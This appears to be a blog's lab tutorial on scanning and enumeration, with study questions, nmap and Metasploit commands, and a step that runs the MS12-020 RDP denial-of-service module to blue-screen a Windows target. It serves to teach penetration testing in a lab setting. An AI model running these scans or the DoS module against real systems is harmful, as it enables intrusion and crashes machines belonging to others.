Warning:
Objective of this blog is to learn about finding system vulnerability and security issues .Never try any method of hacking to any other IP address of any site, government web site or server etc. Because it is under Cyber _Crime.
For education propose you can choice your friends/Lab IP address.
Anybody Using this blog for malicious purpose then I am not responsible. it will under cyber crime.
Scanning and Enumeration- Second Step Of Ethical Hacking.
Note: TCP port 445 which is used for SMB over TCP. The SMB (Server Message Block) protocol is used among other things for file sharing in Windows
Again goto terminal--> your home dir
Objective of this blog is to learn about finding system vulnerability and security issues .Never try any method of hacking to any other IP address of any site, government web site or server etc. Because it is under Cyber _Crime.
For education propose you can choice your friends/Lab IP address.
Anybody Using this blog for malicious purpose then I am not responsible. it will under cyber crime.
Scanning and Enumeration- Second Step Of Ethical Hacking.
After Completing 1st step of Ethical Hacking: Information Gathering, Will perform step 2
Scanning:
Scanning is a common technique used by a penetration tester to find out the open doors,
Enumeration:
Enumeration is the first attack on target network, enumeration is the process to gather the information about a target machine by actively connecting to it.
Q:1 Using Scanning Which information can found?
Q:2 What is open port, null session,reverse_tcp?
Q:3 Study nmap and metasploit software of kali linux.
Q:4 Understand following terms:
1. Vulnerability
2. Exploit
3. Payload
Q:5 Exercise
Ping target Machine to check is it live?
1. Find open ports of Target Machine.
$nmap –T4 –A –v Targetpcip
(check 445 port is open?)
2. Gather Operating system Information of Target Machine.
Goto--> Terminal
Type
$ msfconsole
msf>use auxiliary/scanner/portscan/syn
> set RHOSTS targetmachine ip
>set PORTS 445
> run
if you succeed then
Note: TCP port 445 which is used for SMB over TCP. The SMB (Server Message Block) protocol is used among other things for file sharing in Windows
Again goto terminal--> your home dir
-Find Operating system type and version
- Windows having more vulnerability
$ msfconsole
msf> use auxiliary/scanner/smb/smb_version
>set RHOSTS Targetmachineip
>run
3. You found target machine's OS version- now find its vulnerability and perform attack
$ msfconsole
msf> use auxiliary/dos/windows/rdp/ms12_0_020_maxchannelids
>show options
>set RHOST targetip
>exploit
Check target PC. (Blue screen error)
4. What are the countermeasure for this attack?
5. Demonstrate any two other vulnerability of Windows or Linux.
